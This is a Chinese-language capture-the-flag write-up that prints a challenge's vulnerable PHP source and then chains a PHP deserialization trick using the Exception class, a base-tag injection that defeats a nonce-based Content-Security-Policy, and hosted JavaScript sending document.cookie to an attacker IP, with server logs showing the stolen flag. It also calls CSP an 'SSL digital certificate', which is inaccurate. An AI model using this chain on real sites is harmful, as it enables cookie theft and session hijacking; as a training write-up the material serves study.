SSL数字证书

SSL数字证书及原生类绕过

通过F12查看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<?php
if(!isset($_GET['user'])&&!isset($_GET['username'])&&!isset($_GET['source'])&&!isset($_GET['query'])){
    header("Location: ./?username=guest");
    die();
}
$test=md5(uniqid('',true));
header("Content-Security-Policy:  script-src 'strict-dynamic' 'nonce-$test'; img-src 'self'; style-src 'self';  font-src 'self'; frame-src 'none' ");
header ( "Cache-Control: no-cache, must-revalidate " );
function getCurrentUrl(){
    $scheme = $_SERVER['REQUEST_SCHEME'];
    $domain = $_SERVER['HTTP_HOST'];
    $requestUri = $_SERVER['REQUEST_URI'];
    $currentUrl = $scheme . "://" . $domain . $requestUri;
    return $currentUrl;
}
class user{
    public $username;
    public function __wakeup(){
        if (is_string($this->username)){
            if (preg_match('/script|<|>|onload|onerror/i',$this->username)){
                die('no xss');
            }
            else{
                echo '<h1 id="username">'.htmlentities('welcome back '.$this->username).'</h1>';
            }
        }
        else{
            echo '<h1 id="username">'.$this->username.'&nbsp&nbspis&nbsp&nbspnot&nbsp&nbspallowed,&nbsp&nbsponly&nbsp&nbspstring'.'</h1>';
            file_put_contents('admin.log',$_GET['user']);   //admin will check who attacks him in /admin.php
        }
    }
}
if (isset($_GET['source'])){
    $text=file_get_contents(__FILE__);
    echo $text;
    die();
}
if (isset($_GET['query'])){
    //drive bot to visit your page
    //source code : browser.get('http://127.0.0.1/?'+sys.argv[1])
    //query example:
    //your url : httP://127.0.0.1/?username=guest
    //query : username=guest
    $text=escapeshellarg($_GET['query']);
    #echo($text);
    system('python /var/xssbot/xssbot.py '.$text);
    //sleep(3);
    die();
}
echo "
<html>
<head>
<link rel='stylesheet' href='./css/stylesheet.css'>
</head>
";
echo "<!--?source=1-->\n";
echo "<body>\n";
if (isset($_GET['user'])){
    unserialize(urldecode(base64_decode($_GET['user'])));
}
else if(isset($_GET['username'])){
    echo '<h1 id="username">'.htmlentities('hello '.$_GET['username']).'</h1>';

}



echo '<div id="particles-js"></div>';


echo "
<script nonce='$test' src='./js/jquery-1.12.0.js'></script>
<script nonce='$test' src='./js/particles.min.js'></script>
<script nonce='$test' src='./js/app.js'></script>
 ";
echo "</body>
</html>
";


?>

通过对代码的审计,可知有两层的绕过,第一层是is_string()的绕过,可以使用原生类Exception()来绕过

绕过第一层后,我们可以发现CSP(SSL数字证书):

1
script-src'strict-dynamic''nonce-$test';

通过uniqid,nonce是不可知的,因此我们发现一串代码:

1
2
3
<script nonce='$test' src='./js/jquery-1.12.0.js'></script>
<script nonce='$test' src='./js/particles.min.js'></script>
<script nonce='$test' src='./js/app.js'></script>

因此我们可以通过修改自己的服务器的地址:

1
<base href="//xx.xx.xx.xx:22222">

结合起来,可以得到一个exp

1
2
3
4
5
6
7
<?php
class user{
    public $username;
}
$user=new user();
$user->username=new Exception('<base href="//xx.xx.xx.xx:22222">');
echo base64_encode(serialize($user));

然后我们利用ubuntu来创建一个./js/app.js文件

1
2
root@VM-4-10-ubuntu:~# cat ./js/app.js 
window.open('http://xx.xx.xx.xx:22222/'+document.cookie)

构造payload为

1
?query=user=<base64代码>

我们可以得到

1
2
3
49.235.148.38 - - [14/Jul/2021 13:36:29] "GET /js/particles.min.js HTTP/1.1" 404 -
49.235.148.38 - - [14/Jul/2021 13:36:29] code 404, message File not found
49.235.148.38 - - [14/Jul/2021 13:36:29] "GET /flag=ctfshow%7Bc4580781-d9de-449f-a8ec-f79c6464f037%7D%0A HTTP/1.1" 404 -